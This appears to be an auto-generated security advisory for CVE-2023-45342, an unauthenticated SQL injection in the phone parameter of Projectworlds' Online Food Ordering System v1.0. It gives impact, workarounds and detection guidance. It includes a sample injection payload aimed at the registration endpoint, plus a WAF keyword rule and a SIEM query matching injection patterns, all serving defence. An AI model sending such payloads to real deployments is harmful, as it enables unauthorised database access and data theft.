CVE-2023-45342 – Online Food Ordering System v1.0 has unauthenti... (How to Fix)

Q: What is the severity of CVE-2023-45342?

CVE-2023-45342 has a CVSS score of 9.8 (CRITICAL). Online Food Ordering System v1.0 has unauthenticated SQL injection vulnerabilities in the phone parameter of the registration router. Attackers can execute arbitrary SQL commands without authentication, potentially compromising the entire database. All deployments of this specific version are affected.

📋 TL;DR

Online Food Ordering System v1.0 has unauthenticated SQL injection vulnerabilities in the phone parameter of the registration router. Attackers can execute arbitrary SQL commands without authentication, potentially compromising the entire database. All deployments of this specific version are affected.

💻 Affected Systems

Products:

Online Food Ordering System

Versions: v1.0

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the default installation and requires no special configuration to be exploitable.

📦 What is this software?

Online Food Ordering System by Projectworlds

View all CVEs affecting Online Food Ordering System →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise including data theft, data destruction, authentication bypass, and potential remote code execution via database functions.

🟠

Likely Case

Database information disclosure, credential theft, and potential privilege escalation to administrative access.

🟢

If Mitigated

Limited impact with proper input validation and database permissions, though injection attempts would still be logged.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

SQL injection via phone parameter in routers/register-router.php requires no authentication and uses simple payloads.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://projectworlds.in/

Restart Required: No

Instructions:

1. Check vendor website for updated version. 2. If available, backup database and files. 3. Replace vulnerable files with patched version. 4. Test functionality.

🔧 Temporary Workarounds

Input Validation Filter

all

Add server-side validation to only accept numeric characters in phone parameter

Modify routers/register-router.php to validate phone parameter with preg_match('/^[0-9]+$/', $_POST['phone'])

WAF Rule

all

Implement web application firewall rules to block SQL injection patterns

Add WAF rule: deny requests containing SQL keywords like UNION, SELECT, INSERT, UPDATE, DELETE, DROP in phone parameter

🧯 If You Can't Patch

Implement strict input validation and parameterized queries in the application code
Restrict database user permissions to minimum required and implement network segmentation

🔍 How to Verify

Check if Vulnerable:

Send POST request to routers/register-router.php with phone parameter containing SQL injection payload like ' OR '1'='1

Check Version:

Check version in application files or database configuration

Verify Fix Applied:

Test with same payloads and verify they are rejected or properly escaped

📡 Detection & Monitoring

Log Indicators:

Unusual SQL errors in application logs
Multiple failed registration attempts with special characters in phone field
Database queries with unexpected UNION or SELECT statements

Network Indicators:

HTTP POST requests to register-router.php containing SQL keywords in parameters
Unusual database connection patterns from web server

SIEM Query:

source="web_logs" AND uri="/routers/register-router.php" AND (phone="*UNION*" OR phone="*SELECT*" OR phone="*OR*1=1*")

📊 Metadata

CVE ID: CVE-2023-45342

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-89

Published: November 2, 2023

Last Updated: November 21, 2024

🔗 References

https://fluidattacks.com/advisories/hann Exploit,Third Party Advisory
https://projectworlds.in/ Product
https://fluidattacks.com/advisories/hann Exploit,Third Party Advisory
https://projectworlds.in/ Product

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-45342, you might also want to check these: